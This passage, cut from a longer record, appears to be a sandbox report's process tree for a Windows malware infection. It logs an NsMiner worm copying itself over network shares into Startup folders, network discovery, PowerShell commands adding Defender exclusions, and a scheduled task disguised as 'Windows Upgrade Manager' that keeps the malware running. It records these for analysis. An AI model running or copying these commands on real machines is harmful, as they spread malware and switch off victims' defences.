Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        5⤵
        
        PID:5128
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        6⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\net.exe
        
        net view
        7⤵
        Discovers systems in the same network
        
        PID:3716
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        7⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\ARP.EXE
        
        arp -a
        7⤵
        
        PID:5648
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " 1"
        7⤵
        
        PID:6936
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c set str_
        6⤵
        
        PID:4868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "
        6⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.255.255
        7⤵
        Discovers systems in the same network
        
        PID:3840
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:3316
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        
        PID:7272
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:7556
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:8128
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8140
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5440
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7712
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7852
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2024
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7792
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8060
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:8076
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7480
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7636
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6972
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5764
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7216
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:408
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:8032
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7760
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7788
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7740
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:8064
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:8112
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:8016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:6140
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7880
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7464
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7232
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5488
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "
        6⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"
        7⤵
        
        PID:1320
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ /delete /y
        6⤵
        
        PID:1408
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        Runs ping.exe
        
        PID:3856
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5032
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6348
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:8968
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6996
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5976
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7808
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1228
- - C:\Users\Admin\AppData\Local\Temp\Files\next.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\next.exe"
    3⤵
    PID:6512
  - - C:\Users\Admin\AppData\Roaming\Updatesystem.exe
      "C:\Users\Admin\AppData\Roaming\Updatesystem.exe"
      4⤵
      PID:5632
- - C:\Users\Admin\AppData\Local\Temp\Files\fud.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\fud.exe"
    3⤵
    PID:5200
  - - C:\Users\Admin\AppData\Local\Temp\Files\fud.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\fud.exe"
      4⤵
      PID:2936
- - C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe"
    3⤵
    PID:5896
  - - C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
      "C:\Users\Admin\AppData\Local\Temp\ISetup4.exe"
      4⤵
      PID:4184
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 644
        5⤵
        Program crash
        
        PID:5948
  - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
      "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
      4⤵
      PID:2748
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1228
    - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
        
        "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
        5⤵
        
        PID:7548
- - C:\Users\Admin\AppData\Local\Temp\Files\onecommander.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\onecommander.exe"
    3⤵
    PID:6956
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:7296
- - C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
    3⤵
    PID:1072
- - C:\Users\Admin\AppData\Local\Temp\Files\time2time.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\time2time.exe"
    3⤵
    PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\time2time.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4472
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      4⤵
      PID:5540
- - C:\Users\Admin\AppData\Local\Temp\Files\1234.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1234.exe"
    3⤵
    PID:5616
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\360TS_~1.EXE" /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=
      4⤵
      PID:7716
    - - C:\Users\Admin\AppData\Local\Temp\Files\360TS_~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\Files\360TS_~1.EXE /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=
        5⤵
        
        PID:1912
      - C:\Program Files (x86)\1719870883_0\360TS_~1.EXE
        
        "C:\Program Files (x86)\1719870883_0\360TS_~1.EXE" /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
        6⤵
        
        PID:7600
- - C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe"
    3⤵
    PID:7464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 628
      4⤵
      Program crash
      PID:7856
- - C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"
    3⤵
    PID:7572
- - C:\Users\Admin\AppData\Local\Temp\Files\kdmapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kdmapper.exe"
    3⤵
    PID:7652
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\kdmapper.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\kdmapper.exe"
      4⤵
      PID:7752
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\amadka.exe"
    3⤵
    PID:5180
  - - C:\Users\Admin\AppData\Local\Temp\Files\amadka.exe
      C:\Users\Admin\AppData\Local\Temp\Files\amadka.exe
      4⤵
      PID:7516
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        5⤵
        
        PID:5976
      - C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        6⤵
        
        PID:8004
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        7⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        8⤵
        
        PID:3564
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        9⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        10⤵
        
        PID:7304
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        11⤵
        
        PID:7636
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        12⤵
        
        PID:4876
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        13⤵
        
        PID:7804
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        14⤵
        
        PID:5576
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\27.exe"
    3⤵
    PID:7164
  - - C:\Users\Admin\AppData\Local\Temp\Files\27.exe
      C:\Users\Admin\AppData\Local\Temp\Files\27.exe
      4⤵
      PID:7028
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\5.exe"
    3⤵
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\Files\5.exe
      C:\Users\Admin\AppData\Local\Temp\Files\5.exe
      4⤵
      PID:7736
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\MOTRUH~1.EXE"
    3⤵
    PID:6960
  - - C:\Users\Admin\AppData\Local\Temp\Files\MOTRUH~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\MOTRUH~1.EXE
      4⤵
      PID:7224
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\1.bat" "
        5⤵
        
        PID:7332
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\world.exe
        
        world.exe -priverdD
        6⤵
        
        PID:7220
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX3\korawe.exe"
        7⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\korawe.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\korawe.exe
        8⤵
        
        PID:3948
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
    3⤵
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\Files\first.exe
      C:\Users\Admin\AppData\Local\Temp\Files\first.exe
      4⤵
      PID:6464
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
        5⤵
        
        PID:7644
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7548
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7536
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRAZYC~1.EXE"
    3⤵
    PID:8028
  - - C:\Users\Admin\AppData\Local\Temp\Files\CRAZYC~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\CRAZYC~1.EXE
      4⤵
      PID:7752
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PCHUNT~1.EXE"
    3⤵
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\Files\PCHUNT~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\PCHUNT~1.EXE
      4⤵
      PID:8180
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FINAL%~1.EXE"
    3⤵
    PID:9156
  - - C:\Users\Admin\AppData\Local\Temp\Files\FINAL%~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\FINAL%~1.EXE
      4⤵
      PID:9188
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe"
    3⤵
    PID:7804
  - - C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe
      C:\Users\Admin\AppData\Local\Temp\Files\pinf.exe
      4⤵
      PID:8616
    - - C:\Users\Admin\AppData\Local\Temp\2157315187.exe
        
        C:\Users\Admin\AppData\Local\Temp\2157315187.exe
        5⤵
        
        PID:8948
      - C:\Windows\sysmablsvr.exe
        
        C:\Windows\sysmablsvr.exe
        6⤵
        
        PID:7352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4924
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
  2⤵
  PID:5920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3440

C:\Windows\system32\svchost.exe
